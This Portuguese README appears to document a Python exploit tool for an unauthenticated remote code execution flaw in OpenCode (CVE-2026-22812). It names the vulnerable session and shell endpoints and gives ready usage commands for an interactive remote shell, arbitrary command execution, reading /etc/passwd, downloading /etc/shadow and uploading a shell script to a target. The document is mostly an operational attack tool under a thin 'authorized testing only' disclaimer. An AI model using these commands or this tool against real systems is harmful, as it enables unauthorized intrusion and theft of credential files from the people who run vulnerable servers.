
Ferramenta de exploração em Python para RCE no OpenCode (CVE-2026-22812) que fornece execução de comandos, leitura/escrita/carregamento/baixamento de arquivos e shell interativo para testes de penetração autorizados.
Uma ferramenta de exploração em Python para a vulnerabilidade de Execução Remota de Código (RCE) no OpenCode que afeta versões < v1.0.216. Esta ferramenta fornece múltiplos vetores de ataque, incluindo execução de comandos, leitura/escrita de arquivos, upload/download de arquivos e shell interativo.
⚠️ SOMENTE PARA TESTES AUTORIZADOS ⚠️
# Clonar repositório
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# Instalar dependências
pip install requests urllib3
# Tornar executável (opcional)
chmod +x CVE-2026-22812.py
requestsurllib3python3 CVE-2026-22812.py -t http://alvo:porta [opções]
# Verificar se o alvo é vulnerável
python3 exploit.py -t http://10.0.0.1:4096 --check
# Shell interativo
python3 exploit.py -t http://10.0.0.1:4096 -i
# Executar comando único
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# Ler arquivo
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# Enviar arquivo
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# Baixar arquivo
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# Obter informações do sistema
python3 exploit.py -t http://10.0.0.1:4096 --info
# Usar proxy (Burp Suite, etc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
Uma vez no shell interativo (flag -i), você pode usar:
<comando> Executar comando do shell
help Mostrar menu de ajuda
exit Sair do shell
session Mostrar ID da sessão
stats Mostrar estatísticas de exploração
read <arquivo> Ler conteúdo do arquivo
download <remoto> <local> Baixar arquivo
upload <local> <remoto> Enviar arquivo
sysinfo Obter informações do sistema
A vulnerabilidade existe no endpoint de gerenciamento de sessão (/session) que permite que usuários não autenticados criem sessões e executem comandos arbitrários através do endpoint /session/{id}/shell.
POST /session - Criar sessãoPOST /session/{id}/shell - Executar comandosGET /file/content - Ler arquivosCVE-2026-22812.py
├── Classe Colors (códigos de cor ANSI)
├── print_banner() (Exibir banner)
├── Classe Exploit (Lógica principal de exploração)
│ ├── __init__() (Inicialização)
│ ├── check_vuln() (Verificação de vulnerabilidade)
│ ├── create_session() (Criar sessão)
│ ├── exec_cmd() (Executar comando)
│ ├── read_file() (Ler arquivo)
│ ├── write_file() (Escrever arquivo)
│ ├── upload() (Enviar arquivo)
│ ├── download() (Baixar arquivo)
│ ├── get_info() (Informações do sistema)
│ ├── shell() (Shell interativo)
│ └── Métodos auxiliares
└── main() (Análise de argumentos)
Esta ferramenta é disponibilizada apenas para fins educacionais. Use por sua conta e risco.
Para problemas e dúvidas, por favor: